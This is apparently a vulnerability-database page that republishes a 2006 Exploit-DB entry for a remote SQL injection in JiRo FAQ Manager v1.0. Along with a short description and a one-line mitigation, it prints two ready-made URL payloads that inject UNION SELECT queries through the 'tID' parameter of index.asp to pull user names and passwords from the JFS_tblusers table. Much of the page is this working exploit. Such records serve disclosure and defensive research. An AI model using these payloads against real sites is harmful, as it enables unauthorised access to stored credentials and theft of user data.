header-logo
Suggest Exploit
vendor:
Jiro FAQ Manager
by:
ajann
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Jiro FAQ Manager
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:jiro_software:jiro_faq_manager:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

JiRo? FAQ Manager v1.0 (index.asp) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'tID' parameter to '/index.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit latent vulnerabilities in the underlying database and compromise the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  JiRo´s FAQ Manager v1.0 (index.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(

*******************************************************************************

###http://[target]/[path]//index.asp?tID=[SQL]

Example:

//index.asp?tID=-1%20union%20select%200,uPassword,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200
//index.asp?tID=-1%20union%20select%200,uName,0,0,0,0,0,0,0,0,0,0,0,0%20from%20JFS_tblusers%20where%20no%20like%200


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-11-23]

Navigation

Suggest Exploit

Services By CQR